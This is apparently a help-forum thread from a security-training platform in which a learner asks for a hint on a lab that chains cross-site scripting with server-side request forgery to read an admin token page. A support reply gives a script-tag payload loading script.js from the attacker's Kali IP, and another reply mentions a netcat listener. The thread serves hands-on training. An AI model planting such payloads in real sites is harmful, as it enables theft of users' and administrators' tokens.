Forum Discussion

Bronze I

2 years ago

Solved

Cross-Site Scripting: Ep.6 – Further Exploitation

I was stuck in one question looking for HINT. Extend the XSS vulnerability to view the contents of the /admin/token page with SSRF.

help & support

CyberSharpe
2 years ago
johndoe321I changed the script to a different port to the one being bombarded and did another NC listener on that different port. Roled right in.

ChrisKershaw

Community Support

2 years ago

Hey shubham

Thank you for posting, and welcome to the Human Connection! I'm Chris, I work in the Customer Support Team, and I'll be happy to help you with your attempt 😊.

I'll be happy to share a hint to help you with your lab attempt:

In the Ask a Question page, add the following to the Message field: <script src="http://$KALI_IP/script.js" ></script>

Will you see if this helps you with your attempt?

Forum Discussion

Cross-Site Scripting: Ep.6 – Further Exploitation

Featured Places

Help & Support Forum

Related Content

Re: Cross-Site Scripting: Ep.6 – Further Exploitation

Ep 7 Post Exploitation With Metasploit

Pen Test CTFs: Jinja2 Exploitation

Zeek Ep 4 Scripting

Help with Introduction to Python Scripting: Ep.7 – Demonstrate Your Skills

Recent Discussions

This dashboard version is missing.

Web App Hacking (Lab series): CVE-2022-2143 (iView2)

Elastic Data Ingest: Ep.2 – Filebeat

Web server brute force authentication: Ep. 1 - Compromising an account

Privilege Escalation: Windows – Automated Enumeration